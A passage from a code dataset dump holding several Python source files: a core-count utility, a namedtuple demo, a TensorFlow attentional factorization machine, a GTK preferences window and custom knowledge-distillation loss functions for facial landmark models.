-------\n int\n A correct number of cores according to specifications.\n \"\"\"\n max_cpus = max_cpus or max(cpu_count() - 1, 1)\n\n if n is None:\n return max_cpus\n\n try:\n n = int(n)\n except (TypeError, ValueError) as err:\n _msg = f\"`n` must be `int` or `int`-convertable `str`: {n!r} given.\"\n raise SetupError(_msg) from err\n\n if n < 1:\n _msg = f\"`n` is not positive, this is not possible: {n!r}\"\n raise SetupError(_msg)\n\n if njobs:\n ncores = min(n, njobs, max_cpus)\n log.info(\n f\"Selected {ncores} cores to process {njobs} jobs, with {max_cpus} \"\n \"maximum available cores.\"\n )\n return ncores\n\n log.info(f\"`njobs` not specified, evaluating initial value {n}...\")\n ncores = min(n, max_cpus)\n log.info(f\"Selected {ncores} for a maximum of {max_cpus} CPUs\")\n return ncores\n\n\ndef non_negative_int(\n n,\n exception=ValueError,\n emsg=\"`n` do not satisfies\",\n ):\n \"\"\"\n Transform `n` in int and returns if `compare` evaluates to True.\n\n Parameters\n ----------\n n : int-convertable\n Something that can be converted to int.\n\n exception : Exception\n The Exception to raise in case `n` is not a positive integer.\n\n emsg : str\n The error message to give to `exception`. May accept formatting\n to pass `n`.\n\n Raises\n ------\n ValueError, TypeError\n If `n` cannot be converted to `int`\n \"\"\"\n n1 = int(n)\n if n1 >= 0:\n return n1\n\n # don't change to f-strings, .format has a purpose\n raise exception(emsg.format(n))\n\n\ndef file_exists(\n path,\n exception=ValueError,\n emsg=\"`path` is not a file or does not exist\",\n ):\n \"\"\"\n Asserts file exist.\n\n Parameters\n ----------\n path : str or pathlib.Path\n The file path.\n\n exception : Exception\n The Exception to raise in case `path` is not file or does not\n exist.\n\n emsg : str\n The error message to give to `exception`. May accept formatting\n to pass `path`.\n\n Raises\n ------\n Exception\n Any exception that pathlib.Path can raise.\n \"\"\"\n p = Path(path)\n\n valid = [p.exists, p.is_file]\n\n if all(f() for f in valid):\n return p\n\n # don't change to f-strings, .format has a purpose\n raise exception(emsg.format(str(path)))\n","sub_path":"src/haddock/libs/libutil.py","file_name":"libutil.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"258747401","text":"#!/usr/bin/env python\n\"\"\"people dictionary to showoff namedtuple\"\"\"\nfrom collections import namedtuple\nPERSON = namedtuple('person', 'first_name surname age pet hobbies')\n\n\ndef setup_people():\n \"\"\"returns a dictionary of people with\n key firstname_surname: value: namedtuple PERSON\n that has firstname, surname, age, pet, hobbies items\n \"\"\"\n people = {}\n _add_oliver(people)\n _add_muttley(people)\n return people\n\n\ndef _add_oliver(people):\n \"\"\" adds oliver \"\"\"\n new_p = PERSON(first_name='Oliver', surname='Smart',\n age=21, pet='Rat', hobbies=[])\n key = new_p.first_name + '_' + new_p.surname\n people[key] = new_p\n\ndef main():\n \"\"\" main function run as script \"\"\"\n people = setup_people()\n print(people)\n\ndef _add_muttley(people):\n \"\"\" adds muttley\"\"\"\n new_p = PERSON(first_name='Muttley', surname='Dog',\n age=71, pet='Dick Dastardly', hobbies='Laughing')\n key = new_p.first_name + '_' + new_p.surname\n people[key] = new_p\n\nif __name__ == '__main__':\n main()\n","sub_path":"people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"619369103","text":"import tensorflow as tf\n\n\n\"\"\"\nvec_dim :代表embedding vector维度。\nfield_lens :list结构,其中每个元素代表对应Field有多少取值。例如gender有两个取值,那么其对应的元素为2。\nattention_factor:与论文中含义一致。\nlr :学习率。\nlamda :L2正则化强度。\n\"\"\"\n\n\nclass AFM(object):\n def __init__(self, vec_dim=None, field_lens=None, attention_factor=None, lr=None, dropout_rate=None, lamda=None):\n self.vec_dim = vec_dim\n self.field_lens = field_lens\n self.field_num = len(field_lens)\n self.attention_factor = attention_factor\n self.lr = lr\n self.dropout_rate = dropout_rate\n self.lamda = float(lamda)\n\n self.l2_reg = tf.contrib.layers.l2_regularizer(self.lamda)\n\n self._build_graph()\n\n def _build_graph(self):\n self.add_input()\n self.inference()\n\n def add_input(self):\n self.x = [tf.placeholder(tf.float32, name='input_x_%d'%i) for i in range(self.field_num)]\n self.y = tf.placeholder(tf.float32, shape=[None], name='input_y')\n self.is_train = tf.placeholder(tf.bool)\n\n def inference(self):\n with tf.variable_scope('linear_part'):\n w0 = tf.get_variable(name='bias', shape=[1], dtype=tf.float32)\n linear_w = [tf.get_variable(name='linear_w_%d'%i, shape=[self.field_lens[i]], dtype=tf.float32) for i in range(self.field_num)]\n linear_part = w0 + tf.reduce_sum(\n tf.concat([tf.reduce_sum(tf.multiply(self.x[i], linear_w[i]), axis=1, keep_dims=True) for i in range(self.field_num)], axis=1),\n axis=1, keep_dims=True) # (batch, 1)\n with tf.variable_scope('emb_part'):\n emb = [tf.get_variable(name='emb_%d'%i, shape=[self.field_lens[i], self.vec_dim], dtype=tf.float32) for i in range(self.field_num)]\n emb_layer = tf.stack([tf.matmul(self.x[i], emb[i]) for i in range(self.field_num)], axis=1) # (batch, F, K)\n\n with tf.variable_scope('pair_wise_interaction_part'):\n pi_embedding = []\n for i in range(self.field_num):\n for j in range(i+1, self.field_num):\n pi_embedding.append(tf.multiply(emb_layer[:,i,:], emb_layer[:,j,:])) # [(batch, K), ....]\n pi_embedding = tf.stack(pi_embedding, axis=1) # (batch, F*(F-1)/2, K)\n cross_num = self.field_num * (self.field_num - 1) / 2\n\n with tf.variable_scope('attention_network'):\n # (K, t)\n att_w = tf.get_variable(name='attention_w', shape=[self.vec_dim, self.attention_factor], dtype=tf.float32, regularizer=self.l2_reg) # reg weight\n att_b = tf.get_variable(name='attention_b', shape=[self.attention_factor], dtype=tf.float32)\n att_h = tf.get_variable(name='attention_h', shape=[self.attention_factor, 1], dtype=tf.float32) # (t, 1)\n # wx+b\n attention = tf.matmul(tf.reshape(pi_embedding, shape=(-1, self.vec_dim)), att_w) + att_b # (batch*F*(F-1)/2, t)\n # relu(wx+b)\n attention = tf.nn.relu(attention)\n # h^T(relu(wx+b))\n attention = tf.reshape(tf.matmul(attention, att_h), shape=(-1, cross_num)) # (batch, F*(F-1)/2)\n # softmax\n attention_score = tf.nn.softmax(attention) # (batch, F*(F-1)/2)\n attention_score = tf.reshape(attention_score, shape=(-1, cross_num, 1)) # (batch, F*(F-1)/2, 1)\n\n with tf.variable_scope('prediction_score'):\n weight_sum = tf.multiply(pi_embedding, attention_score) # (batch, F*(F-1)/2, K)\n weight_sum = tf.reduce_sum(weight_sum, axis=1) # (batch, K)\n weight_sum = tf.layers.dropout(weight_sum, rate=self.dropout_rate, training=self.is_train)\n p = tf.get_variable(name='p', shape=[self.vec_dim, 1], dtype=tf.float32)\n pred_score = tf.matmul(weight_sum, p) # (batch, 1)\n\n self.y_logits = linear_part + pred_score\n self.y_hat = tf.nn.sigmoid(self.y_logits)\n self.pred_label = tf.cast(self.y_hat > 0.5, tf.int32)\n self.loss = -tf.reduce_mean(self.y*tf.log(self.y_hat+1e-8) + (1-self.y)*tf.log(1-self.y_hat+1e-8))\n reg_variables = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n if len(reg_variables) > 0:\n self.loss += tf.add_n(reg_variables)\n self.train_op = tf.train.AdamOptimizer(self.lr).minimize(self.loss)\n\n","sub_path":"AFM/AFM1/AFM1.py","file_name":"AFM1.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"212374069","text":"#gi.repository# GObject, Gtk, AppIndicator\nimport gi\ngi.require_version('Gtk', '3.0')\ngi.require_version('Pango', '1.0')\nfrom gi.repository import Gtk as gtk\nfrom gi.repository import Pango as pango\n\n#My modules\nfrom modules import stats as stats\nfrom modules import io as io\n\ncpuswitch = gtk.Switch()\nramswitch = gtk.Switch()\nttuSpinButton = gtk.SpinButton()\n\ndef run():\n window = ConfigWindow()\n window.show_all()\n gtk.main()\n\ndef label(self, text, size):\n hbox = gtk.VBox(True, 1)\n\n label = gtk.Label()\n\n font = pango.FontDescription(\"/Montserrat.ttf \" + str(size))\n label.modify_font(font)\n label.set_markup(text)\n\n hbox.set_homogeneous(True)\n hbox.pack_start(label, True, True, 0)\n\n return hbox\n\ndef checkBox(self, text):\n hbox = gtk.HBox(True, 5)\n\n label = gtk.Label(text)\n\n cbtn = gtk.Switch()\n\n\n if(label == \"CPU\"):\n cbtn.set_active(stats.cpuBool)\n #cbtn.set_state(stats.cpuBool)\n\n elif(label == \"RAM\"):\n cbtn.set_active(stats.ramBool)\n #cbtn.set_state(stats.ramBool)\n elif(label == \"DISK\"):\n cbtn.set_active(stats.diskBool)\n #cbtn.set_state(stats.diskBool)\n\n #hbox.set_homogeneous(True)\n hbox.pack_start(label, False, False, 0)\n hbox.pack_start(cbtn, True, False, 0)\n\n #fix = gtk.Fixed()\n #fix.put(hbox, 0, 0)\n\n return hbox\n\nclass ConfigWindow(gtk.Window):\n def create(self):\n self.connect(\"destroy\", gtk.main_quit)\n self.set_icon_from_file(\"resources/imgs/favicon.png\")\n self.set_title(\"User Preferences\")\n self.set_resizable(False)\n self.set_default_size(256, 128)\n self.set_border_width(10)\n\n print(\"\\033[34mloading...\\033[0m\")\n print(io.load(stats.cpu))\n print(io.load(stats.ram))\n print(io.load(stats.ttu))\n\n cpuswitch.set_active(io.load(stats.cpu))\n ramswitch.set_active(io.load(stats.ram))\n ttuSpinButton.set_value(float(io.load(stats.ttu)))\n\n def saveBottomButtons(self):\n hbox = gtk.HBox(True, 5)\n\n saveButton = gtk.Button(\"Save\")\n saveButton.connect(\"clicked\", self.onSaveChanges)\n cancelButton = gtk.Button(\"Exit\")\n cancelButton.connect(\"clicked\", gtk.main_quit)\n\n hbox.pack_start(saveButton, False, False, 0)\n hbox.pack_start(cancelButton, False, False, 0)\n\n return hbox\n\n def onSaveChanges(self, button):\n stats.cpuBool = cpuswitch.get_active()\n stats.ramBool = ramswitch.get_active()\n stats.ttuValue = ttuSpinButton.get_value()\n print(\"Saving..\")\n io.save(self)\n print(\"\\033[32m Saved \\033[0m\")\n print(\"CPU : \" + str(stats.cpuBool))\n print(\"RAM : \" + str(stats.ramBool))\n print(\"TTU : \" + str(stats.ttuValue))\n\n def onSwitchCpu(self, switch, bool):\n if(switch.get_active() == True):\n stats.cpuBool = False\n else:\n stats.cpuBool = True\n cpuswitch.set_active(switch.get_active())\n\n def onSwitchRam(self, switch, bool):\n if(switch.get_active() == True):\n stats.ramBool = False\n else:\n stats.ramBool = True\n ramswitch.set_active(switch.get_active())\n\n def onSwitchTtu (self, SpinButton):\n stats.ttuValue = SpinButton.get_value()\n print(stats.ttuValue)\n\n def __init__(self):\n super(ConfigWindow, self).__init__()\n self.init_ui()\n\n def init_ui(self):\n self.create()\n #mainBox\n mainBox = gtk.Box()\n\n #VBox\n vbox = gtk.VBox(spacing = 7)\n\n\n \"\"\"TITLES\"\"\"\n title = label(self,\"User Preferences\", 20)\n subtitle = label(self,\"Show in top bar:\", 13)\n\n \"\"\"CPU SWITCH\"\"\"\n cpuBox = gtk.HBox(spacing = 3)\n cpuLabel = label(self, \"CPU\", 15)\n cpuSwitch = gtk.Switch()\n cpuSwitch.set_active(io.load(stats.cpu))\n cpuSwitch.connect(\"notify::active\", self.onSwitchCpu)\n cpuBox.pack_start(cpuLabel, True, False, 0)\n cpuBox.pack_start(cpuSwitch, True, False, 0)\n\n \"\"\"RAM SWITCH\"\"\"\n ramBox = gtk.HBox(spacing = 3)\n ramLabel = label(self, \"RAM\", 15)\n ramSwitch = gtk.Switch()\n ramSwitch.set_active(io.load(stats.ram))\n ramSwitch.connect(\"notify::active\", self.onSwitchRam)\n ramBox.pack_start(ramLabel, True, False, 0)\n ramBox.pack_start(ramSwitch, True, False, 0)\n\n \"\"\"TTU SPIN BUTTON\"\"\"\n ttuBox = gtk.HBox(spacing = 3)\n ttuLabel = label(self, \"Time to Update\", 10)\n ttuSpinButton = gtk.SpinButton()\n\n ttuSpinButton.set_digits(2)\n ttuSpinButton.set_range(0, 5)\n ttuSpinButton.set_increments(0.25, 0.25)\n ttuSpinButton.set_value(float(io.load(stats.ttu)))\n\n ttuSpinButton.connect(\"value-changed\", self.onSwitchTtu)\n ttuBox.pack_start(ttuLabel, True, False, 0)\n ttuBox.pack_start(ttuSpinButton, True, False, 0)\n\n\n bottomButtons = self.saveBottomButtons()\n\n #vbox.add(title)\n #vbox.add(subtitle)\n vbox.add(cpuBox)\n vbox.add(ramBox)\n vbox.add(ttuBox)\n\n align = gtk.Alignment(xalign = 1.0, yalign = 1.0, xscale = 0, yscale = 0.3)\n align.add(bottomButtons)\n\n vbox.add(align)\n\n #packagerObject\n box = gtk.Box(spacing=1)\n #fix = gtk.Fixed()\n\n #fix.put(box, 0, 0)\n self.add(box)\n box.pack_start(vbox, True, False, 0)\n","sub_path":"modules/user_preferences.py","file_name":"user_preferences.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"201877032","text":"import math\n\nimport numpy as np\nimport tensorflow as tf\n\n# tf.compat.v1.disable_eager_execution()\n# tf.compat.v1.enable_eager_execution()\n\nfrom PIL import Image\nfrom tensorflow.keras import backend as K\nfrom scipy.spatial import distance\n\nfrom cnn_model import CNNModel\nfrom configuration import DatasetName, IbugConf, LearningConfig\nfrom image_utility import ImageUtility\nfrom pca_utility import PCAUtility\nfrom tf_record_utility import TFRecordUtility\n\nprint(tf.__version__)\n\n\nclass Custom_losses:\n def custom_face_web_loss(self, bath_size, ds_name, num_points, loss_type, main_loss_wight,\n inter_faceweb_weight, intra_faceweb_weight):\n def loss(y_true, y_pred):\n \"\"\"\"\"\"\n '''calculate the main loss'''\n if loss_type == 0:\n '''MAE'''\n main_loss = tf.reduce_mean(tf.abs(y_true - y_pred))\n elif loss_type == 1:\n '''MSE'''\n main_loss = tf.reduce_mean(tf.square(y_true - y_pred))\n '''calculate the inter faceweb distance: the distance between each facial elements(nose to mouth)'''\n inter_fb_gt = self._create_inter_fwd(ds_name, y_true, bath_size)\n inter_fb_pr = self._create_inter_fwd(ds_name, y_pred, bath_size)\n '''calculate the intra faceweb distance: the internal distance between a facial element(eye)'''\n\n return loss\n\n # def kd_loss(self, y_pr, y_gt, y_togh_t, y_tol_t, l_w_stu_t, l_w_togh_t, l_w_tol_t, loss_type=0):\n # \"\"\"\"\"\"\n # '''calculate the sign of difference'''\n # sign_delta_gt_and_tough_teacher = tf.sign((y_gt - y_togh_t))\n # sign_delta_gt_and_tol_teacher = tf.sign((y_gt - y_tol_t))\n # '''create weight_map'''\n # weight_map_t_tough = tf.math.multiply(tf.ones_like(y_gt), l_w_togh_t)\n # weight_map_t_tol = tf.math.multiply(tf.ones_like(y_gt), l_w_tol_t)\n #\n # '''find indices that need to be modified'''\n # minus_one_tough = tf.constant(l_w_togh_t, dtype=tf.float32)\n # minus_one_tol = tf.constant(l_w_tol_t, dtype=tf.float32)\n # where_cond_tough = tf.not_equal(sign_delta_gt_and_tough_teacher, minus_one_tough)\n # where_cond_tol = tf.not_equal(sign_delta_gt_and_tol_teacher, minus_one_tol)\n #\n # '''calculate the opposite sign items and fill map'''\n # indices_tough = tf.where(where_cond_tough)\n # indices_tol = tf.where(where_cond_tol)\n # weight_map_t_tough = self._fill_opposite_sign_map(indices=indices_tough, y_gt=y_gt, y_pr=y_pr,\n # y_t=y_togh_t,\n # loss_weight=l_w_togh_t,\n # loss_map=weight_map_t_tough)\n # weight_map_t_tol = self._fill_opposite_sign_map(indices=indices_tough, y_gt=y_gt, y_pr=y_pr,\n # y_t=y_tol_t,\n # loss_weight=l_w_tol_t,\n # loss_map=weight_map_t_tol)\n # '''apply map to the teacher weights'''\n # y_togh_t = tf.math.multiply(weight_map_t_tough, y_togh_t)\n # y_tol_t = tf.math.multiply(weight_map_t_tol, y_tol_t)\n #\n # return loss\n\n def kd_loss(self, x_pr, x_gt, x_tough, x_tol,\n alpha_tough, alpha_mi_tough,\n alpha_tol, alpha_mi_tol,\n main_loss_weight, tough_loss_weight, tol_loss_weight,\n num_of_landmarks):\n\n # loss_main = tf.reduce_mean(tf.sqrt(tf.abs(x_gt - x_pr)))\n # loss_main = tf.reduce_mean(tf.square(x_gt - x_pr))\n loss_main = tf.reduce_mean(tf.abs(x_gt - x_pr))\n return loss_main, 0, 0, 0\n\n\n \"\"\"\"\"\"\n '''creating np version of input tensors'''\n loss_shape = (x_pr.shape[0], x_pr.shape[1])\n # np_x_pr = x_pr.numpy().reshape(x_pr.shape[0] * x_pr.shape[1])\n np_x_pr = tf.reshape(tensor=x_pr, shape=x_pr.shape[0] * x_pr.shape[1])\n np_x_gt = tf.reshape(tensor=x_gt, shape=x_gt.shape[0] * x_gt.shape[1])\n np_x_tough = tf.reshape(tensor=x_tough, shape=x_tough.shape[0] * x_tough.shape[1])\n np_x_tol = tf.reshape(tensor=x_tol, shape=x_tol.shape[0] * x_tol.shape[1])\n # np_x_pr = K.eval(x_pr).reshape(x_pr.shape[0] * x_pr.shape[1])\n # np_x_gt = K.eval(x_gt).reshape(x_gt.shape[0] * x_gt.shape[1])\n # np_x_tough = K.eval(x_tough).reshape(x_tough.shape[0] * x_tough.shape[1])\n # np_x_tol = K.eval(x_tol).reshape(x_tol.shape[0] * x_tol.shape[1])\n\n '''calculate the weight map'''\n\n # weight_map_tough = [self.calc_teacher_weight_loss(x_pr=np_x_pr[i], x_gt=np_x_gt[i], x_t=np_x_tough[i],\n # alpha=alpha_tough, alpha_mi=alpha_mi_tough)\n # for i in range(np_x_pr.shape[0])]\n # weight_map_tol = [self.calc_teacher_weight_loss(x_pr=np_x_pr[i], x_gt=np_x_gt[i], x_t=np_x_tol[i],\n # alpha=alpha_tol, alpha_mi=alpha_mi_tol)\n # for i in range(np_x_pr.shape[0])]\n\n weight_map_tough = np.zeros_like(np_x_tough)\n weight_map_tol = np.zeros_like(np_x_tol)\n for i in range(np_x_pr.shape[0]):\n weight_map_tough[i] = self.calc_teacher_weight_loss(x_pr=np_x_pr[i], x_gt=np_x_gt[i], x_t=np_x_tough[i],\n alpha=alpha_tough, alpha_mi=alpha_mi_tough)\n weight_map_tol[i] = self.calc_teacher_weight_loss(x_pr=np_x_pr[i], x_gt=np_x_gt[i], x_t=np_x_tol[i],\n alpha=alpha_tol, alpha_mi=alpha_mi_tol)\n '''reshape loss'''\n weight_map_tough = weight_map_tough.reshape(loss_shape)\n weight_map_tol = weight_map_tol.reshape(loss_shape)\n\n # weight_map_tough = np.array(weight_map_tough).reshape(loss_shape)\n # weight_map_tol = np.array(weight_map_tol).reshape(loss_shape)\n\n loss_tough = tf.reduce_mean(weight_map_tough * tf.abs(x_tough - x_pr))\n loss_tol = tf.reduce_mean(weight_map_tol * tf.abs(x_tol - x_pr))\n '''calculate the losses'''\n\n loss_main = main_loss_weight * tf.reduce_mean(tf.abs(x_gt - x_pr))\n loss_tough = tough_loss_weight * loss_tough\n loss_tol = tol_loss_weight * loss_tol\n loss_total = loss_main + loss_tough + loss_tol\n '''returns all losses'''\n return loss_total, loss_main, loss_tough, loss_tol\n\n def calc_teacher_weight_loss(self, x_pr, x_gt, x_t, alpha, alpha_mi):\n weight_loss_t = 0\n '''calculate betas'''\n beta = x_gt + 0.4 * abs(x_gt - x_t)\n beta_mi = x_gt - 0.4 * abs(x_gt - x_t)\n if x_t > x_gt:\n if x_pr >= x_t:\n weight_loss_t = alpha\n elif beta <= x_pr < x_t:\n weight_loss_t = alpha_mi\n elif x_gt <= x_pr < beta:\n weight_loss_t = (alpha_mi / (beta - x_gt)) * (x_pr - x_gt)\n elif beta_mi < x_pr < x_gt:\n weight_loss_t = (alpha / (beta_mi - x_gt)) * (x_pr - x_gt)\n elif x_pr <= beta_mi:\n weight_loss_t = alpha\n elif x_t < x_gt:\n if x_pr <= x_t:\n weight_loss_t = alpha\n elif x_t < x_pr <= beta_mi:\n weight_loss_t = alpha_mi\n elif beta_mi < x_pr <= x_gt:\n weight_loss_t = (-alpha_mi / (x_gt - beta_mi)) * (x_pr - x_gt)\n elif x_gt < x_pr <= beta:\n weight_loss_t = (alpha / (beta - x_gt)) * (x_pr - x_gt)\n elif x_pr > beta:\n weight_loss_t = alpha\n return weight_loss_t\n\n def custom_teacher_student_loss(self, lnd_img_map, img_path, teacher_models, teachers_weight_loss, bath_size,\n num_points, ds_name, loss_type):\n def loss(y_true, y_pred):\n image_utility = ImageUtility()\n\n t0_model = teacher_models[0]\n t1_model = teacher_models[1]\n l0_weight = teachers_weight_loss[0]\n l1_weight = teachers_weight_loss[1]\n\n y_true_n = tf.reshape(y_true, [bath_size, num_points], name=None)\n imgs_address = self.get_y(y_true_n, lnd_img_map, img_path)\n imgs_batch = [np.array(Image.open(img_file)) / 255.0 for img_file in imgs_address]\n\n y_pred_T0 = np.array([t0_model.predict(np.expand_dims(img, axis=0))[0] for img in imgs_batch])\n y_pred_T1 = np.array([t1_model.predict(np.expand_dims(img, axis=0))[0] for img in imgs_batch])\n\n '''test teacher Nets'''\n # counter = 0\n # for pre_points in y_pred_T1:\n # labels_predict_transformed, landmark_arr_x_p, landmark_arr_y_p = \\\n # image_utility.create_landmarks_from_normalized(pre_points, 224, 224, 112, 112)\n # imgpr.print_image_arr((counter + 1) * 1000, imgs_batch[counter], landmark_arr_x_p, landmark_arr_y_p)\n # counter += 1\n\n y_pred_Tough_ten = K.variable(y_pred_T0)\n y_pred_Tol_ten = K.variable(y_pred_T1)\n\n '''calculate the sign of difference'''\n sign_delta_gt_and_tough_teacher = tf.sign((y_true - y_pred_Tough_ten))\n sign_delta_gt_and_tol_teacher = tf.sign((y_true - y_pred_Tol_ten))\n '''for each point, if signs are the same, we sum losses, \n but if signs are different, we minus the \n teacher loses from the main loss, IF:\n asb(y_pred - y_pred_tech_i)) < '''\n\n '''assign weight loss'''\n tough_teacher_weight_loss = 1\n tol_teacher_weight_loss = 1\n\n '''create weight_map'''\n weight_map_t_tough = tf.math.multiply(tf.ones_like(y_true), tough_teacher_weight_loss)\n weight_map_t_tol = tf.math.multiply(tf.ones_like(y_true), tol_teacher_weight_loss)\n\n '''find indices that need to be modified'''\n minus_one_tough = tf.constant(tough_teacher_weight_loss, dtype=tf.float32)\n minus_one_tol = tf.constant(tough_teacher_weight_loss, dtype=tf.float32)\n where_cond_tough = tf.not_equal(sign_delta_gt_and_tough_teacher, minus_one_tough)\n where_cond_tol = tf.not_equal(sign_delta_gt_and_tol_teacher, minus_one_tol)\n\n '''calculate the opposite sign items and fill map'''\n indices_tough = tf.where(where_cond_tough)\n indices_tol = tf.where(where_cond_tol)\n\n weight_map_t_tough = self._fill_opposite_sign_map(indices=indices_tough, y_gt=y_true, y_pr=y_pred,\n y_t=y_pred_Tough_ten,\n loss_weight=tough_teacher_weight_loss,\n loss_map=weight_map_t_tough)\n weight_map_t_tol = self._fill_opposite_sign_map(indices=indices_tough, y_gt=y_true, y_pr=y_pred,\n y_t=y_pred_Tol_ten,\n loss_weight=tol_teacher_weight_loss,\n loss_map=weight_map_t_tol)\n '''apply map to the teacher weights'''\n y_pred_Tough_ten = tf.math.multiply(weight_map_t_tough, y_pred_Tough_ten)\n y_pred_Tol_ten = tf.math.multiply(weight_map_t_tol, y_pred_Tol_ten)\n ''''''\n if loss_type == 0:\n '''MAE'''\n mse_te0 = tf.reduce_mean(tf.abs(y_pred - y_pred_Tough_ten))\n mse_te1 = tf.reduce_mean(tf.abs(y_pred - y_pred_Tol_ten))\n mse_main = tf.reduce_mean(tf.abs(y_pred - y_true))\n elif loss_type == 1:\n '''MSE'''\n mse_te0 = tf.reduce_mean(tf.square(y_pred - y_pred_Tough_ten))\n mse_te1 = tf.reduce_mean(tf.square(y_pred - y_pred_Tol_ten))\n mse_main = tf.reduce_mean(tf.square(y_pred - y_true))\n ''' or:'''\n # mse = tf.keras.losses.MeanSquaredError()\n # mse_te0 = mse(y_pred_T0_ten, y_true)\n ''' or:'''\n # mse_main = K.mean(K.square(y_pred - y_true))\n # mse_main = K.mean(K.square(y_pred - y_true))\n\n return 10 * mse_main + ((l0_weight * mse_te0) + (l1_weight * mse_te1))\n\n return loss\n\n def _fill_opposite_sign_map(self, indices, y_gt, y_pr, y_t, loss_weight, loss_map):\n for index in indices:\n loss_map[index] = loss_weight * y_pr[index] / abs(y_gt[index] - y_t[index])\n return loss_map\n\n def get_y(self, y_true_n, lnd_img_map, img_path):\n vec_mse = K.eval(y_true_n)\n print(vec_mse.shape)\n imgs = []\n for lnd in vec_mse:\n print(lnd.shape)\n # lnd = lnd.tostring()\n # print(lnd)\n # lnd_hash = self.get_hash_key(lnd)\n lnd_hash = self.np_to_str(lnd)\n print(\"-------------------\")\n print(lnd_hash)\n print(\"-------------------\")\n key = lnd_hash\n img_name = lnd_img_map[key]\n imgs.append(img_path + img_name)\n return np.array(imgs)\n\n def np_to_str(self, input):\n str_out = ''\n for item in input:\n str_out += str(item)[:3]\n return str_out\n\n def get_hash_key(self, input):\n return str(hash(str(input).replace(\"\\n\", \"\").replace(\" \", \"\")))\n\n def _decode_tf_file_name(self, file_name):\n return str(file_name).replace(\"X\", \"\")\n\n # def _create_inter_fwd(self, ds_name, y_pred, bath_size):\n # \"\"\"based on the database, we return the distance between each facial elements\"\"\"\n # if ds_name == DatasetName.cofw:\n # # elif ds_name == DatasetName.ibug:\n # # elif ds_name == DatasetName.wflw:\n\n def asm_assisted_loss(self, hmp_85, hmp_90, hmp_95):\n def loss(y_true, y_pred):\n return K.mean(K.square(y_pred - y_true))\n\n return loss\n\n def _calculate_mse(self, y_p, y_t):\n mse = (np.square(y_p - y_t)).mean(axis=None)\n # print('y_p: '+str(y_p.shape))\n # print('mse: '+str(mse.shape))\n # loss = 0\n # for j in range(len(y_p)):\n # loss += (y_p[j] - y_t[j]) ** 2\n # loss /= len(y_p)\n\n # print('calculate_mse: ' + str(mse))\n return mse\n\n def _generate_distance_matrix(self, xy_arr):\n x_arr = xy_arr[[slice(None, None, 2) for _ in range(xy_arr.ndim)]]\n y_arr = xy_arr[[slice(1, None, 2) for _ in range(xy_arr.ndim)]]\n\n d_matrix = np.zeros(shape=[len(x_arr), len(y_arr)])\n for i in range(0, x_arr.shape[0], 1):\n for j in range(i + 1, x_arr.shape[0], 1):\n p1 = [x_arr[i], y_arr[i]]\n p2 = [x_arr[j], y_arr[j]]\n d_matrix[i, j] = distance.euclidean(p1, p2)\n d_matrix[j, i] = distance.euclidean(p1, p2)\n return d_matrix\n\n def _depart_facial_point(self, xy_arr):\n face = xy_arr[0:54] # landmark_face_len = 54\n nose = xy_arr[54:72] # landmark_nose_len = 18\n leys = xy_arr[72:84] # landmark_eys_len = 24\n reys = xy_arr[84:96] # landmark_eys_len = 24\n mouth = xy_arr[96:136] # landmark_mouth_len = 40\n return face, nose, leys, reys, mouth\n\n def custom_loss_hm(self, ten_hm_t, ten_hm_p):\n # print(ten_hm_t.get_shape()) # [None, 56, 56, 68]\n # print(ten_hm_p.get_shape())\n\n tf_utility = TFRecordUtility()\n\n sqr = K.square(ten_hm_t - ten_hm_p) # [None, 56, 56, 68]\n mean1 = K.mean(sqr, axis=1)\n mean2 = K.mean(mean1, axis=1)\n tensor_mean_square_error = K.mean(mean2, axis=1)\n\n # print(tensor_mean_square_error.get_shape().as_list()) # [None, 68]\n\n # vec_mse = K.eval(tensor_mean_square_error)\n # print(\"mse.shape:\")\n # print(vec_mse.shape) # (50, 68)\n # print(vec_mse)\n # print(\"----------->>>\")\n\n '''calculate points from generated hm'''\n\n p_points_batch = tf.stack([tf_utility.from_heatmap_to_point_tensor(ten_hm_p[i], 5, 1)\n for i in range(LearningConfig.batch_size)])\n\n t_points_batch = tf.stack([tf_utility.from_heatmap_to_point_tensor(ten_hm_t[i], 5, 1)\n for i in range(LearningConfig.batch_size)])\n\n '''p_points_batch is [batch, 2, 68]'''\n sqr_2 = K.square(t_points_batch - p_points_batch) # [None, 2, 68]\n mean_1 = K.mean(sqr_2, axis=1)\n tensor_indices_mean_square_error = K.mean(mean_1, axis=1)\n\n # tensor_total_loss = tf.reduce_mean([tensor_mean_square_error, tensor_indices_mean_square_error])\n\n tensor_total_loss = tf.add(tensor_mean_square_error, tensor_indices_mean_square_error)\n return tensor_total_loss\n\n def custom_loss_hm_distance(self, ten_hm_t, ten_hm_p):\n print(ten_hm_t.get_shape().as_list()) # [None, 56, 56, 68]\n print(ten_hm_p.get_shape())\n\n tf_utility = TFRecordUtility()\n\n sqr = K.square(ten_hm_t - ten_hm_p) # [None, 56, 56, 68]\n mean1 = K.mean(sqr, axis=1)\n mean2 = K.mean(mean1, axis=1)\n tensor_mean_square_error = K.mean(mean2, axis=1)\n # print(tensor_mean_square_error.get_shape().as_list()) # [None, 68]\n\n # vec_mse = K.eval(tensor_mean_square_error)\n # print(\"mse.shape:\")\n # print(vec_mse.shape) # (50, 68)\n # print(vec_mse)\n # print(\"----------->>>\")\n\n '''convert tensor to vector'''\n vec_hm_p = K.eval(ten_hm_p)\n vec_hm_t = K.eval(ten_hm_t)\n\n loss_array = []\n\n for i in range(LearningConfig.batch_size):\n '''convert heatmap to points'''\n x_h_p, y_h_p, xy_h_p = tf_utility.from_heatmap_to_point(vec_hm_p[i], 5, 1)\n x_h_t, y_h_t, xy_h_t = tf_utility.from_heatmap_to_point(vec_hm_t[i], 5, 1)\n\n '''normalise points to be in [0, 1]'''\n x_h_p = x_h_p / 56\n y_h_p = y_h_p / 56\n xy_h_p = xy_h_p / 56\n x_h_t = x_h_t / 56\n y_h_t = y_h_t / 56\n xy_h_t = xy_h_t / 56\n '''test print images'''\n # 